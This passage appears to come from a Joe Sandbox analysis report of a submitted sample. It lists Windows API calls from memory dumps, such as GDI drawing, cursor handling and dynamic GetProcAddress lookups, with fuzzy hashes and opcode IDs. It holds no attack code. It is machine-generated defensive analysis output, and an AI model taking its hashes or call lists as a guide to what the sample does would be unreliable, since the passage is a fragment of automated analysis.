                                                                              • Opcode Fuzzy Hash: 53fe9a462762cb4918ee61071ab08c48f7ebae39ed882d9ecfdb03bcb5db6ebb
                                                                              • Instruction Fuzzy Hash: 76014875A04704BFDB05DBA5CC42F5EB7ECDB49714F614476F604E7281D5789E008B68
                                                                              APIs
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$Delete$Stretch
                                                                              • String ID:
                                                                              • API String ID: 1458357782-0
                                                                              • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                              • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                              • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                              • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 004233AF
                                                                              • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                              • SetCursor.USER32(00000000), ref: 00423413
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                              • String ID:
                                                                              • API String ID: 1770779139-0
                                                                              • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                              • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                              • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                              • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494EAC
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494EB9
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494EC6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                              • API String ID: 667068680-2254406584
                                                                              • Opcode ID: 86a2ddc52e299a4ebb71bf23d73df01b3b4fd34307be7bd5855d98afd1a17bd4
                                                                              • Instruction ID: 92166a125eb2f71293346f1714c1de0d588af794120117df170beecaff70c54b
                                                                              • Opcode Fuzzy Hash: 86a2ddc52e299a4ebb71bf23d73df01b3b4fd34307be7bd5855d98afd1a17bd4
                                                                              • Instruction Fuzzy Hash: 5FF0F65278171627DE1026668C41F7F6ACCDBD5761F050137BE05AB3C2E99C8C0242FD
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4E1
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4F1
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                              • API String ID: 190572456-212574377
                                                                              • Opcode ID: 0cec18ecd77b334d9913731d687bcbf118ffb91831bb9c9ad7683d7253c977df
                                                                              • Instruction ID: f545bb075b74a91891c18b47f2e11744e93a99b0212facb5d31f4bd58d546edf
                                                                              • Opcode Fuzzy Hash: 0cec18ecd77b334d9913731d687bcbf118ffb91831bb9c9ad7683d7253c977df
                                                                              • Instruction Fuzzy Hash: 6EF0D0B0D01704EAE724DFB6ACC77363A959BA431AF14943B9A0D96263E678044DCF2D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480DAC), ref: 0042EA35
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                              • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                              • API String ID: 142928637-2676053874
                                                                              • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                              • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                              • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                              • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                              • API String ID: 2238633743-1050967733
                                                                              • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                              • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                              • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                              • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498794), ref: 00478746
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478753
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478763
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                              • API String ID: 667068680-222143506
                                                                              • Opcode ID: c231c6f2b70c156a9a87dd751a131f3597001cd76c60e66cfe2a3d12b45a0e7a
                                                                              • Instruction ID: d9a2c3c187cd73cba94933972f30ec689a131e62bb2a59a557d4d9670201d7da
                                                                              • Opcode Fuzzy Hash: c231c6f2b70c156a9a87dd751a131f3597001cd76c60e66cfe2a3d12b45a0e7a
                                                                              • Instruction Fuzzy Hash: 79C0C9F02C0700EA9604B7F11CCBA7A2548C500729330803FB19EA6182D97C0C104A6C
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B745
                                                                              • GetDC.USER32(?), ref: 0041B751
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                              • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                              • String ID:
                                                                              • API String ID: 3275473261-0
                                                                              • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                              • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                              • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                              • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041BA17
                                                                              • GetDC.USER32(?), ref: 0041BA23
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                              • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                              • String ID:
                                                                              • API String ID: 3275473261-0
                                                                              • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                              • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                              • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                              • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B57E
                                                                              • GetDC.USER32(?), ref: 0041B58A
                                                                              • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                              • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                              • String ID:
                                                                              • API String ID: 2502006586-0
                                                                              • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                              • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                              • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                              • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                              APIs
                                                                              • SetLastError.KERNEL32(00000057,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF07
                                                                              • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFD4,?,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                              • API String ID: 1452528299-1580325520
                                                                              • Opcode ID: 1bdeb0a210bc513e3c49bf4cbd891cc1911c01b4b436513822a1df069e086b30
                                                                              • Instruction ID: 452c5d812052531473411f8275c40b5c85b18bf76fc7955a310c39f58cd58d14
                                                                              • Opcode Fuzzy Hash: 1bdeb0a210bc513e3c49bf4cbd891cc1911c01b4b436513822a1df069e086b30
                                                                              • Instruction Fuzzy Hash: 3811A536204304AFD711DAA1C9C2A9EB69EDB44706F604037AD00A62C7D67C5F0AD52D
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                              • GetDC.USER32(00000000), ref: 0041BDE9
                                                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDeviceMetricsSystem$Release
                                                                              • String ID:
                                                                              • API String ID: 447804332-0
                                                                              • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                              • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                              • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                              • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                              • LocalFree.KERNEL32(007FF478,00000000,00401B68), ref: 00401ACF
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,007FF478,00000000,00401B68), ref: 00401AEE
                                                                              • LocalFree.KERNEL32(00800478,?,00000000,00008000,007FF478,00000000,00401B68), ref: 00401B2D
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                              • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                              • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                              • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                              • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E24A
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CBBD), ref: 0047E270
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E280
                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2A1
                                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2B5
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$Show
                                                                              • String ID:
                                                                              • API String ID: 3609083571-0
                                                                              • Opcode ID: b4e19ff4e98ab52ecda950bfdcb646100cf30b97dd598c6192f2cb622b5c4e11
                                                                              • Instruction ID: c2beb8629b08809d81cb9269d2d7eee694fde7899d985d279cae8c77c91b058d
                                                                              • Opcode Fuzzy Hash: b4e19ff4e98ab52ecda950bfdcb646100cf30b97dd598c6192f2cb622b5c4e11
                                                                              • Instruction Fuzzy Hash: A40140B1641210ABE610D769DE41F2237DCAB0C360F0907A6BA44EF3E3C728E8408B49
                                                                              APIs
                                                                                • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                              • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                              • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                              • String ID:
                                                                              • API String ID: 3527656728-0
                                                                              • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                              • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
